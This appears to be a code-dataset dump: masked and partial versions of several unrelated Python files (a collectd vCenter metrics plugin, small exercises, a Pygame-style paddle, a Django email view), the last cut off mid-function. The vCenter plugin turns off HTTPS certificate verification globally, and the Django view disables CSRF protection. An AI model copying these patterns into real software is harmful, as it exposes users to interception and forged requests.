for dc_name, dc_data in data['datacenter'].items():
clusters = dc_data.pop('cluster', {})
hosts = dc_data.pop('host', {})
for key, value in dc_data.items():
self.dispatch(vcenter, 'dc_%s' % (key,), dc_name, value)
for c_name, c_data in clusters.items():
c_hosts = c_data.pop('host', {})
for key, value in c_data.items():
o_type = 'cluster_%s' % (key,)
self.dispatch(dc_name, o_type, c_name, value)
for ch_name, ch_data in c_hosts.items():
dispatch_host(ch_name, ch_data)
for h_name, h_data in hosts.items():
dispatch_host(h_name, h_data)
time.sleep(self.sleep_time)
def dispatch(self, host, obj_type, obj_instance, value):
"""
Helper to clean up metric sending.
:param str host:
The name of the host to which the metric belongs.
:param str obj_type:
The type of metric to report.
:param str obj_instance:
An instance to associate with the metric.
:param int value:
The value of the metric.
"""
val = collectd.Values(type='gauge', plugin=self.NAME, host=host)
val.type_instance = obj_type
val.plugin_instance = obj_instance
val.values = [value]
val.dispatch()
class CollectdHandler(logging.Handler):
"""
Expose collectd logger using standard Python logging.
"""
def __init__(self, verbose=False, *args, **kwargs):
self.verbose = verbose
super(CollectdHandler, self).__init__(*args, **kwargs)
if COLLECTD_ENABLED:
self._handler_map = {logging.CRITICAL: collectd.error, logging.
ERROR: collectd.error, logging.WARN: collectd.warning,
logging.INFO: collectd.info, logging.DEBUG: collectd.info}
def emit(self, record):
if not COLLECTD_ENABLED:
return
if record.level == logging.DEBUG and not self.verbose:
return
handler = self._handler_map[record.level]
handler(record.getMessage())
<mask token>
| # collectd-vcenter - vcenter.py
#
# Author : Loic Lambiel @ exoscale
# Contributor : Josh VanderLinden
# Description : This is a collectd python module to gather stats from Vmware
# vcenter
import logging
import ssl
import time
from pysphere import VIServer
try:
import collectd
COLLECTD_ENABLED = True
except ImportError:
COLLECTD_ENABLED = False
try:
_create_unverified_https_context = ssl._create_unverified_context
except AttributeError:
# Legacy Python that doesn't verify HTTPS certificates by default
pass
else:
# Handle target environment that doesn't support HTTPS verification
ssl._create_default_https_context = _create_unverified_https_context
MB = 1024 ** 2
HOST_STATUS = ('green', 'gray', 'yellow', 'red')
class Collector(object):
def __init__(self, vcenters, username=None, password=None,
verbose=False):
"""
Configuration to poll a vCenter cluster for performance data.
:param list vcenters:
A list of one or more vCenter server IPs or hostnames.
:param str username:
The username to use to authenticate against the vCenter cluster.
:param str password:
The password associated with the specified user.
:param bool verbose: (optional)
Whether to enable verbose logging.
:param int sleep_time: (optional)
Number of seconds to wait between polls.
"""
self.vcenters = vcenters
self.username = username
self.password = password
self.verbose = verbose
if COLLECTD_ENABLED:
self.log = logging.getLogger()
self.log.addHandler(CollectdHandler(self.verbose))
else:
logging.basicConfig(level=logging.DEBUG)
self.log = logging.getLogger()
def poll(self):
"""
Collect current performance information.
"""
stats = {}
for vcenter in self.vcenters:
stats[vcenter] = self.poll_vcenter(vcenter)
return stats
def poll_vcenter(self, vcenter):
"""
Open a connection to the specified vCenter server and begin gathering
information about its datastores, datacenters, clusters, and hosts.
:param str vcenter:
The hostname or IP of a vCenter server.
:returns:
A dictionary containing information about the current state of
objects managed by the specified vCenter.
"""
self.log.debug('polling %s@%s' % (self.username, vcenter))
server = VIServer()
try:
server.connect(vcenter, self.username, self.password)
except:
self.log.exception('Failed to connect to %s' % (vcenter,))
return {}
stats = {
'datastore': {},
'datacenter': {},
}
for obj, name in server.get_datastores().items():
ds_stats = self.poll_datastore(server, obj, name)
stats['datastore'][name] = ds_stats
datacenters = server.get_datacenters()
for obj, name in datacenters.items():
dc_stats = self.poll_datacenter(server, obj, name)
stats['datacenter'][name] = dc_stats
return stats
def poll_datastore(self, server, obj, name):
"""
Gather metrics about a specific datastore.
:param VIServer server:
A valid connection to a vCenter server.
:param MOR obj:
Managed object for the datastore.
:param str name:
Name of the datastore.
:returns:
A dictionary with four keys: capacity, free, used, and usage. The
capacity, free, and used space are measured in megabytes while the
usage is a percentage.
"""
capacity = free = usage = 0
try:
self.log.debug('query datastore %s' % (name,))
props = server._retrieve_properties_traversal(property_names=[
'name',
'summary.capacity',
'summary.freeSpace',
], from_node=obj, obj_type='Datastore')
for ps in props:
for prop in ps.PropSet:
pn, pv = prop.Name, prop.Val
if pn == 'summary.capacity':
capacity = pv / MB
elif pn == 'summary.freeSpace':
free = pv / MB
except:
self.log.exception('Failed to get datastore metrics')
if capacity > 0:
usage = (capacity - free) / float(capacity) * 100
return {
'capacity': capacity,
'free': free,
'used': capacity - free,
'usage': usage,
}
def poll_datacenter(self, server, obj, name):
"""
Gather metrics about a specific datacenter.
:param VIServer server:
A valid connection to a vCenter server.
:param MOR obj:
Managed object for the datacenter.
:param str name:
Name of the datacenter.
:returns:
A dictionary with several keys describing the current state of the
datacenter. This dictionary includes information about each cluster
and host that is part of the specified datacenter.
"""
if '.' in name:
name = name.split('.')[0]
stats = self._poll_group('datacenter', server, obj, name)
cluster_host_stats = self._poll_group('cluster', server, obj, name)
for key, value in cluster_host_stats.items():
if key not in stats:
stats[key] = value
elif isinstance(stats[key], dict):
for c_key, c_value in value.items():
stats[key][c_key] = c_value
else:
if 'percent' in key:
stats[key] = (stats[key] + value) / 2
else:
stats[key] += value
return stats
def poll_cluster(self, server, obj, name):
"""
Gather metrics about a specific cluster.
:param VIServer server:
A valid connection to a vCenter server.
:param MOR obj:
Managed object for the cluster.
:param str name:
Name of the cluster.
:returns:
A dictionary with several keys describing the current state of the
cluster. This dictionary includes information about each host that
is part of the specified cluster.
"""
return self._poll_group('cluster', server, obj, name)
def _poll_group(self, group_type, server, obj, name):
"""
Generic metrics gathering for datacenters and clusters.
:param VIServer server:
A valid connection to a vCenter server.
:param MOR obj:
Managed object for a datacenter or cluster.
:param str name:
Name of a datacenter or cluster.
:returns:
A dictionary with several keys describing the current state of the
datacenter/cluster. This dictionary includes information about each
cluster and/or host that is part of the specified object.
"""
# change collection behavior based on the type of group we're dealing
# with
if group_type == 'datacenter':
# find each cluster in the datacenter
find_children = server.get_clusters
poll_child = self.poll_cluster
child_type = 'cluster'
elif group_type == 'cluster':
# find each host in the datacenter or cluster
find_children = server.get_clusters
find_children = server.get_hosts
poll_child = self.poll_host
child_type = 'host'
self.log.debug('start querying %s: %s' % (group_type, name))
children = find_children(obj)
self.log.debug('finish querying %s: %s' % (group_type, name))
# initialize some metrics
cpu_total = cpu_usage = cpu_percent = 0
mem_total = mem_usage = mem_percent = 0
vms_total = vms_running = vms_stopped = 0
child_stats = {}
# iterate over each child node in this object group
for child_obj, child_name in children.items():
stats = poll_child(server, child_obj, child_name)
child_stats[child_name] = stats
# aggregate data from each child to the top level
cpu_total += stats['cpu_total']
cpu_usage += stats['cpu_usage']
mem_total += stats['mem_total']
mem_usage += stats['mem_usage']
vms_total += stats['vms_total']
vms_running += stats['vms_running']
vms_stopped += stats['vms_stopped']
# recalculate percentages
if cpu_total > 0:
cpu_percent = cpu_usage / float(cpu_total) * 100
if mem_total > 0:
mem_percent = mem_usage / float(mem_total) * 100
# return the current metrics for this group
group_stats = {
'cpu_total': cpu_total,
'cpu_usage': cpu_usage,
'cpu_percent': cpu_percent,
'mem_total': mem_total,
'mem_usage': mem_usage,
'mem_percent': mem_percent,
'vms_total': vms_total,
'vms_running': vms_running,
'vms_stopped': vms_stopped,
child_type: child_stats,
}
return group_stats
def poll_host(self, server, obj, name):
"""
Gather metrics about a specific host.
:param VIServer server:
A valid connection to a vCenter server.
:param MOR obj:
Managed object for the host.
:param str name:
Name of the host.
:returns:
A dictionary with several keys describing the current state of the
host, including CPU, memory, and virtual machine information.
"""
self.log.debug('found host: %s' % (name,))
status = 0
cpu_total = cpu_usage = cpu_percent = cpu_count = cpu_mhz_per_core = 0
mem_total = mem_usage = mem_percent = 0
vms_total = vms_running = vms_stopped = 0
if '.' in name and name.count('.') != 3:
name = name.split('.')[0]
props = server._retrieve_properties_traversal(property_names=[
'name',
'summary.overallStatus',
'summary.quickStats.overallMemoryUsage',
'summary.quickStats.overallCpuUsage',
'summary.hardware.memorySize',
'summary.hardware.numCpuCores',
'summary.hardware.cpuMhz',
], from_node=obj, obj_type='HostSystem')
for prop_set in props:
for prop in prop_set.PropSet:
pn, pv = prop.Name, prop.Val
if pn == 'summary.overallStatus':
status = HOST_STATUS.index(pv)
elif pn == 'summary.quickStats.overallMemoryUsage':
mem_usage = pv
elif pn == 'summary.quickStats.overallCpuUsage':
cpu_usage = pv
elif pn == 'summary.hardware.memorySize':
mem_total = pv / MB
elif pn == 'summary.hardware.numCpuCores':
cpu_count = pv
elif pn == 'summary.hardware.cpuMhz':
cpu_mhz_per_core = pv
vms_total = len(server.get_registered_vms(obj))
vms_running = len(server.get_registered_vms(obj, status='poweredOn'))
vms_stopped = len(server.get_registered_vms(obj, status='poweredOff'))
cpu_total = cpu_count * cpu_mhz_per_core
cpu_percent = cpu_usage / float(cpu_total) * 100
mem_percent = mem_usage / float(mem_total) * 100
stats = {
'status': status,
'cpu_total': cpu_total,
'cpu_usage': cpu_usage,
'cpu_percent': cpu_percent,
'cpu_count': cpu_count,
'mem_total': mem_total,
'mem_usage': mem_usage,
'mem_percent': mem_percent,
'vms_total': vms_total,
'vms_running': vms_running,
'vms_stopped': vms_stopped,
}
return stats
class CollectdCollector(Collector):
"""
Handle dispatching statistics to collectd.
"""
NAME = 'vCenter'
def __init__(self, *args, **kwargs):
super(CollectdCollector, self).__init__(*args, **kwargs)
self.sleep_time = kwargs.get('sleep_time', 20)
def configure(self, conf):
"""
Callback to configure the plugin based on collectd's settings.
"""
for node in conf.children:
key = node.key
val = node.values[0]
if key == 'Vcenter':
self.vcenters = val.split()
elif key == 'Username':
self.username = val
elif key == 'Password':
self.password = val
elif key == 'Verbose':
self.verbose = bool(val)
elif key == 'Sleep':
self.sleep_time = int(val)
else:
self.log.warn('Unknown config key: %s' % (key,))
def read(self):
"""
Callback to send data back to collectd.
"""
self.log.debug('Beginning read callback')
info = self.poll()
if not info:
self.log.warn('No data received')
return
def dispatch_host(name, data):
"""
Helper to reduce duplication
"""
for key, value in data.items():
self.dispatch(name, 'host_%s' % (key,), name, value)
# report information for all vCenter servers
for vcenter, data in info.items():
# report datastore information
for ds_name, ds_data in data['datastore'].items():
for key, value in ds_data.items():
self.dispatch(vcenter, 'ds_%s' % (key,), ds_name, value)
# report datacenter information
for dc_name, dc_data in data['datacenter'].items():
# extract any cluster and host information for later processing
clusters = dc_data.pop('cluster', {})
hosts = dc_data.pop('host', {})
for key, value in dc_data.items():
self.dispatch(vcenter, 'dc_%s' % (key,), dc_name, value)
# report cluster information
for c_name, c_data in clusters.items():
c_hosts = c_data.pop('host', {})
for key, value in c_data.items():
o_type = 'cluster_%s' % (key,)
self.dispatch(dc_name, o_type, c_name, value)
for ch_name, ch_data in c_hosts.items():
dispatch_host(ch_name, ch_data)
# report host information
for h_name, h_data in hosts.items():
dispatch_host(h_name, h_data)
time.sleep(self.sleep_time)
def dispatch(self, host, obj_type, obj_instance, value):
"""
Helper to clean up metric sending.
:param str host:
The name of the host to which the metric belongs.
:param str obj_type:
The type of metric to report.
:param str obj_instance:
An instance to associate with the metric.
:param int value:
The value of the metric.
"""
val = collectd.Values(type='gauge', plugin=self.NAME, host=host)
val.type_instance = obj_type
val.plugin_instance = obj_instance
val.values = [value]
val.dispatch()
class CollectdHandler(logging.Handler):
"""
Expose collectd logger using standard Python logging.
"""
def __init__(self, verbose=False, *args, **kwargs):
self.verbose = verbose
super(CollectdHandler, self).__init__(*args, **kwargs)
if COLLECTD_ENABLED:
self._handler_map = {
logging.CRITICAL: collectd.error,
logging.ERROR: collectd.error,
logging.WARN: collectd.warning,
logging.INFO: collectd.info,
logging.DEBUG: collectd.info,
}
def emit(self, record):
if not COLLECTD_ENABLED:
return
if record.level == logging.DEBUG and not self.verbose:
return
handler = self._handler_map[record.level]
handler(record.getMessage())
if COLLECTD_ENABLED:
instance = CollectdCollector([])
collectd.register_config(instance.configure)
collectd.register_read(instance.read)
| [
11,
13,
19,
20,
24
] |
614 | 7e50fc5eb794d7f2e4805924dcc7a99296e0d732 | /usr/share/pyshared/Bio/Phylo/_io.py | null | null | null | null | [
0
] |
615 | a571abd88184c8d8bb05245e9c3ce2e4dabb4c09 | <mask token>
| <mask token>
for _ in range(t):
n, m = map(int, sys.stdin.readline().split())
q = deque(map(int, sys.stdin.readline().split()))
count = 0
while q:
highest = max(q)
doc = q.popleft()
m -= 1
if doc != highest:
q.append(doc)
if m < 0:
m = len(q) - 1
else:
count += 1
if m < 0:
print(count)
break
| <mask token>
t = int(sys.stdin.readline().rstrip())
for _ in range(t):
n, m = map(int, sys.stdin.readline().split())
q = deque(map(int, sys.stdin.readline().split()))
count = 0
while q:
highest = max(q)
doc = q.popleft()
m -= 1
if doc != highest:
q.append(doc)
if m < 0:
m = len(q) - 1
else:
count += 1
if m < 0:
print(count)
break
| import sys
from collections import deque
t = int(sys.stdin.readline().rstrip())
for _ in range(t):
n, m = map(int, sys.stdin.readline().split())
q = deque(map(int, sys.stdin.readline().split()))
count = 0
while q:
highest = max(q)
doc = q.popleft()
m -= 1
if doc != highest:
q.append(doc)
if m < 0:
m = len(q) - 1
else:
count += 1
if m < 0:
print(count)
break
| null | [
0,
1,
2,
3
] |
616 | 2257494dec9fccc4e8bd4acf0aff31a73c252a61 | <mask token>
| <mask token>
def draw():
global h, xorg, yoff, xcount, xvel
if frameCount % 10 == 0:
fill(140, 0.49, 0.75, 0.2)
square(0, 0, width)
pushMatrix()
translate(xorg, yoff)
y = sin(frameCount % 20 / 20.0 * PI + PI) * h
if frameCount % 20 == 0 and frameCount > 0:
h -= 50
if h <= 0:
fill(0)
ellipse(xcount, y, 25, 10)
fill(0, 0, 1)
circle(xcount, y, 5)
yoff = random(300, 700)
xcount = 0
xvel = random(1, 3)
if random(1) > 0.5:
xvel *= -1
xorg = random(400, 600)
else:
xorg = random(50, 400)
h = int(random(3, 7)) * 50
else:
fill(0, 0, 1)
circle(xcount, y, 5)
xcount += xvel
popMatrix()
saveFrame('frames/####.jpg')
if frameCount > 700:
noLoop()
| <mask token>
def setup():
size(800, 800)
colorMode(HSB, 360, 1, 1, 1)
background(140, 0.49, 0.75)
frameRate(30)
noStroke()
def draw():
global h, xorg, yoff, xcount, xvel
if frameCount % 10 == 0:
fill(140, 0.49, 0.75, 0.2)
square(0, 0, width)
pushMatrix()
translate(xorg, yoff)
y = sin(frameCount % 20 / 20.0 * PI + PI) * h
if frameCount % 20 == 0 and frameCount > 0:
h -= 50
if h <= 0:
fill(0)
ellipse(xcount, y, 25, 10)
fill(0, 0, 1)
circle(xcount, y, 5)
yoff = random(300, 700)
xcount = 0
xvel = random(1, 3)
if random(1) > 0.5:
xvel *= -1
xorg = random(400, 600)
else:
xorg = random(50, 400)
h = int(random(3, 7)) * 50
else:
fill(0, 0, 1)
circle(xcount, y, 5)
xcount += xvel
popMatrix()
saveFrame('frames/####.jpg')
if frameCount > 700:
noLoop()
| h = 160
xorg = 0
yoff = 400
xcount = 0
xvel = 2
def setup():
size(800, 800)
colorMode(HSB, 360, 1, 1, 1)
background(140, 0.49, 0.75)
frameRate(30)
noStroke()
def draw():
global h, xorg, yoff, xcount, xvel
if frameCount % 10 == 0:
fill(140, 0.49, 0.75, 0.2)
square(0, 0, width)
pushMatrix()
translate(xorg, yoff)
y = sin(frameCount % 20 / 20.0 * PI + PI) * h
if frameCount % 20 == 0 and frameCount > 0:
h -= 50
if h <= 0:
fill(0)
ellipse(xcount, y, 25, 10)
fill(0, 0, 1)
circle(xcount, y, 5)
yoff = random(300, 700)
xcount = 0
xvel = random(1, 3)
if random(1) > 0.5:
xvel *= -1
xorg = random(400, 600)
else:
xorg = random(50, 400)
h = int(random(3, 7)) * 50
else:
fill(0, 0, 1)
circle(xcount, y, 5)
xcount += xvel
popMatrix()
saveFrame('frames/####.jpg')
if frameCount > 700:
noLoop()
| h = 160
xorg = 0
yoff = 400
xcount = 0
xvel = 2
def setup():
size(800, 800)
colorMode(HSB, 360, 1, 1, 1)
background(140, 0.49, 0.75)
frameRate(30)
noStroke()
def draw():
global h, xorg, yoff, xcount, xvel
if frameCount % 10 == 0:
fill(140, 0.49, 0.75, 0.2)
square(0,0,width)
pushMatrix()
translate(xorg,yoff)
y = sin((frameCount%20)/20.0*PI+PI)*h
if (frameCount % 20 == 0 and frameCount > 0):
h -= 50
if h <= 0:
fill(0)
ellipse(xcount, y, 25, 10)
fill(0,0,1)
circle(xcount, y, 5)
yoff = random(300, 700)
xcount = 0
xvel = random(1,3)
if random(1)>0.5:
xvel *= -1
xorg = random(400,600)
else:
xorg = random(50,400)
h = int(random(3,7))*50
else:
fill(0,0,1)
circle(xcount, y, 5)
xcount += xvel
popMatrix()
saveFrame("frames/####.jpg")
if frameCount > 700:
noLoop()
| [
0,
1,
2,
3,
4
] |
617 | 6f99b4e4204e85c78f9c02a5cd53cd76f52c022c | <mask token>
def notify(msg):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
if not s.connect_ex(('localhost', 9001)):
s.sendall(bytes(msg, 'utf8'))
<mask token>
| <mask token>
def test_json(text):
jobj = json.loads(text)
l = len(jobj['coordinates'])
x = 0
y = 0
z = 0
for coord in jobj['coordinates']:
x += coord['x']
y += coord['y']
z += coord['z']
print(x / l)
print(y / l)
print(z / l)
def notify(msg):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
if not s.connect_ex(('localhost', 9001)):
s.sendall(bytes(msg, 'utf8'))
<mask token>
| <mask token>
def test_json(text):
jobj = json.loads(text)
l = len(jobj['coordinates'])
x = 0
y = 0
z = 0
for coord in jobj['coordinates']:
x += coord['x']
y += coord['y']
z += coord['z']
print(x / l)
print(y / l)
print(z / l)
def notify(msg):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
if not s.connect_ex(('localhost', 9001)):
s.sendall(bytes(msg, 'utf8'))
if __name__ == '__main__':
text = Path('/tmp/1.json').read_text()
notify('%s UltraJSON\t%d' % (platform.python_implementation(), os.getpid())
)
test_json(text)
notify('stop')
| import ujson as json
import platform
import socket
import os
from pathlib import Path
def test_json(text):
jobj = json.loads(text)
l = len(jobj['coordinates'])
x = 0
y = 0
z = 0
for coord in jobj['coordinates']:
x += coord['x']
y += coord['y']
z += coord['z']
print(x / l)
print(y / l)
print(z / l)
def notify(msg):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
if not s.connect_ex(('localhost', 9001)):
s.sendall(bytes(msg, 'utf8'))
if __name__ == '__main__':
text = Path('/tmp/1.json').read_text()
notify('%s UltraJSON\t%d' % (platform.python_implementation(), os.getpid())
)
test_json(text)
notify('stop')
| import ujson as json
import platform
import socket
import os
from pathlib import Path
def test_json(text):
jobj = json.loads(text)
l = len(jobj['coordinates'])
x = 0
y = 0
z = 0
for coord in jobj['coordinates']:
x += coord['x']
y += coord['y']
z += coord['z']
print(x / l)
print(y / l)
print(z / l)
def notify(msg):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
if not s.connect_ex(("localhost", 9001)):
s.sendall(bytes(msg, 'utf8'))
if __name__ == '__main__':
text = Path('/tmp/1.json').read_text()
notify("%s UltraJSON\t%d" % (platform.python_implementation(), os.getpid()))
test_json(text)
notify("stop")
| [
1,
2,
3,
4,
5
] |
618 | 94be205e516c1f1248b6028419c04c927236596e | <mask token>
| <mask token>
def test_colorization_net():
model_cfg = dict(type='ColorizationNet', input_nc=4, output_nc=2,
norm_type='batch')
model = MODELS.build(model_cfg)
assert model.__class__.__name__ == 'ColorizationNet'
input_A = torch.rand(1, 1, 256, 256)
input_B = torch.rand(1, 2, 256, 256)
mask_B = torch.rand(1, 1, 256, 256)
target_shape = 1, 2, 256, 256
out_class, out_reg, feature_map = model(input_A, input_B, mask_B)
assert isinstance(feature_map, dict)
assert feature_map['conv1_2'].shape == (1, 64, 256, 256) and feature_map[
'out_reg'].shape == target_shape
if torch.cuda.is_available():
model = model.cuda()
input_A = input_A.cuda()
input_B = input_B.cuda()
mask_B = mask_B.cuda()
out_class, out_reg, feature_map = model(input_A, input_B, mask_B)
assert isinstance(feature_map, dict)
for item in feature_map.keys():
assert torch.is_tensor(feature_map[item])
| import torch
from mmagic.registry import MODELS
def test_colorization_net():
model_cfg = dict(type='ColorizationNet', input_nc=4, output_nc=2,
norm_type='batch')
model = MODELS.build(model_cfg)
assert model.__class__.__name__ == 'ColorizationNet'
input_A = torch.rand(1, 1, 256, 256)
input_B = torch.rand(1, 2, 256, 256)
mask_B = torch.rand(1, 1, 256, 256)
target_shape = 1, 2, 256, 256
out_class, out_reg, feature_map = model(input_A, input_B, mask_B)
assert isinstance(feature_map, dict)
assert feature_map['conv1_2'].shape == (1, 64, 256, 256) and feature_map[
'out_reg'].shape == target_shape
if torch.cuda.is_available():
model = model.cuda()
input_A = input_A.cuda()
input_B = input_B.cuda()
mask_B = mask_B.cuda()
out_class, out_reg, feature_map = model(input_A, input_B, mask_B)
assert isinstance(feature_map, dict)
for item in feature_map.keys():
assert torch.is_tensor(feature_map[item])
| # Copyright (c) OpenMMLab. All rights reserved.
import torch
from mmagic.registry import MODELS
def test_colorization_net():
model_cfg = dict(
type='ColorizationNet', input_nc=4, output_nc=2, norm_type='batch')
# build model
model = MODELS.build(model_cfg)
# test attributes
assert model.__class__.__name__ == 'ColorizationNet'
# prepare data
input_A = torch.rand(1, 1, 256, 256)
input_B = torch.rand(1, 2, 256, 256)
mask_B = torch.rand(1, 1, 256, 256)
target_shape = (1, 2, 256, 256)
# test on cpu
(out_class, out_reg, feature_map) = model(input_A, input_B, mask_B)
assert isinstance(feature_map, dict)
assert feature_map['conv1_2'].shape == (1, 64, 256, 256) \
and feature_map['out_reg'].shape == target_shape
# test on gpu
if torch.cuda.is_available():
model = model.cuda()
input_A = input_A.cuda()
input_B = input_B.cuda()
mask_B = mask_B.cuda()
(out_class, out_reg, feature_map) = \
model(input_A, input_B, mask_B)
assert isinstance(feature_map, dict)
for item in feature_map.keys():
assert torch.is_tensor(feature_map[item])
| null | [
0,
1,
2,
3
] |
619 | cb3c1adb9d91aecee5b21774d61dfe9400a330fa | <mask token>
class Paddle:
def __init__(self):
self.center = Point(390, 50)
self.velocity = Velocity(0, 5)
<mask token>
def move_up(self):
if self.center.y < config.SCREEN_HEIGHT - config.PADDLE_HEIGHT / 2:
self.center.y = self.center.y + self.velocity.dy
def move_down(self):
if self.center.y > 0 + config.PADDLE_HEIGHT / 2:
self.center.y = self.center.y - self.velocity.dy
| <mask token>
class Paddle:
def __init__(self):
self.center = Point(390, 50)
self.velocity = Velocity(0, 5)
def draw(self):
self.drawing = arcade.draw_rectangle_filled(self.center.x, self.
center.y, config.PADDLE_WIDTH, config.PADDLE_HEIGHT, arcade.
color.ELECTRIC_LIME)
def move_up(self):
if self.center.y < config.SCREEN_HEIGHT - config.PADDLE_HEIGHT / 2:
self.center.y = self.center.y + self.velocity.dy
def move_down(self):
if self.center.y > 0 + config.PADDLE_HEIGHT / 2:
self.center.y = self.center.y - self.velocity.dy
| <mask token>
PADDLE_WIDTH = 15
PADDLE_HEIGHT = 30
class Paddle:
def __init__(self):
self.center = Point(390, 50)
self.velocity = Velocity(0, 5)
def draw(self):
self.drawing = arcade.draw_rectangle_filled(self.center.x, self.
center.y, config.PADDLE_WIDTH, config.PADDLE_HEIGHT, arcade.
color.ELECTRIC_LIME)
def move_up(self):
if self.center.y < config.SCREEN_HEIGHT - config.PADDLE_HEIGHT / 2:
self.center.y = self.center.y + self.velocity.dy
def move_down(self):
if self.center.y > 0 + config.PADDLE_HEIGHT / 2:
self.center.y = self.center.y - self.velocity.dy
| from point import Point
from velocity import Velocity
import arcade
import config
PADDLE_WIDTH = 15
PADDLE_HEIGHT = 30
class Paddle:
def __init__(self):
self.center = Point(390, 50)
self.velocity = Velocity(0, 5)
def draw(self):
self.drawing = arcade.draw_rectangle_filled(self.center.x, self.
center.y, config.PADDLE_WIDTH, config.PADDLE_HEIGHT, arcade.
color.ELECTRIC_LIME)
def move_up(self):
if self.center.y < config.SCREEN_HEIGHT - config.PADDLE_HEIGHT / 2:
self.center.y = self.center.y + self.velocity.dy
def move_down(self):
if self.center.y > 0 + config.PADDLE_HEIGHT / 2:
self.center.y = self.center.y - self.velocity.dy
| from point import Point
from velocity import Velocity
import arcade
import config
PADDLE_WIDTH = 15
PADDLE_HEIGHT = 30
class Paddle:
def __init__(self):
self.center = Point(390, 50)
self.velocity = Velocity(0, 5)
def draw(self):
self.drawing = arcade.draw_rectangle_filled(self.center.x, self.center.y, config.PADDLE_WIDTH, config.PADDLE_HEIGHT, arcade.color.ELECTRIC_LIME)
def move_up(self):
if self.center.y < config.SCREEN_HEIGHT - (config.PADDLE_HEIGHT / 2):
self.center.y = self.center.y + self.velocity.dy
def move_down(self):
if self.center.y > 0 + (config.PADDLE_HEIGHT / 2):
self.center.y = self.center.y - self.velocity.dy
| [
4,
5,
6,
7,
8
] |
620 | 44224985dbfa6234eff406149ce25e1d00b512e9 | class Anagram(object):
<mask token>
<mask token>
<mask token>
def match(self, words):
return filter(self._is_anagram, words)
| class Anagram(object):
def __init__(self, word):
self.word = word
self.canonical = self._canonicalize(word)
<mask token>
<mask token>
def match(self, words):
return filter(self._is_anagram, words)
| class Anagram(object):
def __init__(self, word):
self.word = word
self.canonical = self._canonicalize(word)
<mask token>
def _is_anagram(self, word):
return word != self.word and self._canonicalize(word) == self.canonical
def match(self, words):
return filter(self._is_anagram, words)
| class Anagram(object):
def __init__(self, word):
self.word = word
self.canonical = self._canonicalize(word)
def _canonicalize(self, word):
return sorted(word.lower())
def _is_anagram(self, word):
return word != self.word and self._canonicalize(word) == self.canonical
def match(self, words):
return filter(self._is_anagram, words)
| null | [
2,
3,
4,
5
] |
621 | c2839046592469dfae7526f72be947126960ba19 | <mask token>
| <mask token>
@login_required
@csrf_exempt
def social(request):
if request.method == 'POST':
data = request.POST
project_id = int(json.loads(data.get('projid')))
head = data.get('head')
head = json.loads(head)
subhead = json.loads(data.get('subh'))
content = json.loads(data.get('cont'))
obtained = json.loads(data.get('pass'))
with connection.cursor() as curr:
curr.execute(
'SELECT manager_id,customer_id FROM socialMedia where project_id=%s'
, [project_id])
rec_id = namedtuplefetchall(curr)
manager_id = rec_id[0].manager_id
customer_id = rec_id[0].customer_id
print('SENDING')
with connection.cursor() as curr:
curr.execute('select contact from customer where customer_id = %s',
[customer_id])
email = namedtuplefetchall(curr)
customer_email = email[0].contact
pwd = settings.EMAIL_HOST_PASSWORD
if encrypto.verify(obtained, pwd) == True:
send_mail(head, subhead + '\n' + content, 'Gauri Baraskar',
'[email protected]', settings.EMAIL_HOST_USER,
obtained)
else:
messages.warning(request, 'Wrong Password Entered')
return JsonResponse(1, safe=False)
else:
with connection.cursor() as curr:
curr.execute(
'select project.project_id,project_name from works_on,project where user_id=%s and project.project_id=works_on.project_id'
, [request.user.id])
res = namedtuplefetchall(curr)
return render(request, 'social/index.html', {'social': res})
| from django.shortcuts import render
from django.contrib.auth.decorators import login_required
from django.views.decorators.csrf import csrf_exempt
from projects.models import Project
from django.db import connection
from .utils import namedtuplefetchall
from django.http import JsonResponse
from django.contrib import messages
import json
from django.views.decorators.csrf import csrf_exempt
from .utils import send_mail
from DBMS import settings
from passlib.hash import pbkdf2_sha256 as encrypto
@login_required
@csrf_exempt
def social(request):
if request.method == 'POST':
data = request.POST
project_id = int(json.loads(data.get('projid')))
head = data.get('head')
head = json.loads(head)
subhead = json.loads(data.get('subh'))
content = json.loads(data.get('cont'))
obtained = json.loads(data.get('pass'))
with connection.cursor() as curr:
curr.execute(
'SELECT manager_id,customer_id FROM socialMedia where project_id=%s'
, [project_id])
rec_id = namedtuplefetchall(curr)
manager_id = rec_id[0].manager_id
customer_id = rec_id[0].customer_id
print('SENDING')
with connection.cursor() as curr:
curr.execute('select contact from customer where customer_id = %s',
[customer_id])
email = namedtuplefetchall(curr)
customer_email = email[0].contact
pwd = settings.EMAIL_HOST_PASSWORD
if encrypto.verify(obtained, pwd) == True:
send_mail(head, subhead + '\n' + content, 'Gauri Baraskar',
'[email protected]', settings.EMAIL_HOST_USER,
obtained)
else:
messages.warning(request, 'Wrong Password Entered')
return JsonResponse(1, safe=False)
else:
with connection.cursor() as curr:
curr.execute(
'select project.project_id,project_name from works_on,project where user_id=%s and project.project_id=works_on.project_id'
, [request.user.id])
res = namedtuplefetchall(curr)
return render(request, 'social/index.html', {'social': res})
| from django.shortcuts import render
from django.contrib.auth.decorators import login_required
from django.views.decorators.csrf import csrf_exempt
# Create your views here.
from projects.models import Project
from django.db import connection
from .utils import namedtuplefetchall
from django.http import JsonResponse
from django.contrib import messages
import json
from django.views.decorators.csrf import csrf_exempt
from .utils import send_mail
from DBMS import settings
from passlib.hash import pbkdf2_sha256 as encrypto
# Create your views here.
@login_required
@csrf_exempt
def social(request):
if request.method == "POST":
data = request.POST
project_id = int(json.loads(data.get('projid')))
head = data.get('head')
head = json.loads(head)
subhead = json.loads(data.get('subh'))
content = json.loads(data.get('cont'))
obtained = json.loads(data.get('pass'))
with connection.cursor() as curr:
curr.execute("SELECT manager_id,customer_id FROM socialMedia where project_id=%s",[project_id])
rec_id = namedtuplefetchall(curr)
manager_id = rec_id[0].manager_id
customer_id = rec_id[0].customer_id
print("SENDING")
with connection.cursor() as curr:
curr.execute("select contact from customer where customer_id = %s",[customer_id])
email = namedtuplefetchall(curr)
customer_email = email[0].contact
# Rename the email field with customer_email to send to customers when we have actual data
pwd = settings.EMAIL_HOST_PASSWORD
if encrypto.verify(obtained,pwd) == True:
#print("asjdhasd")
send_mail(head,subhead+'\n'+content,'Gauri Baraskar','[email protected]',settings.EMAIL_HOST_USER,obtained)
else:
messages.warning(request,"Wrong Password Entered")
return JsonResponse(1,safe=False)
else:
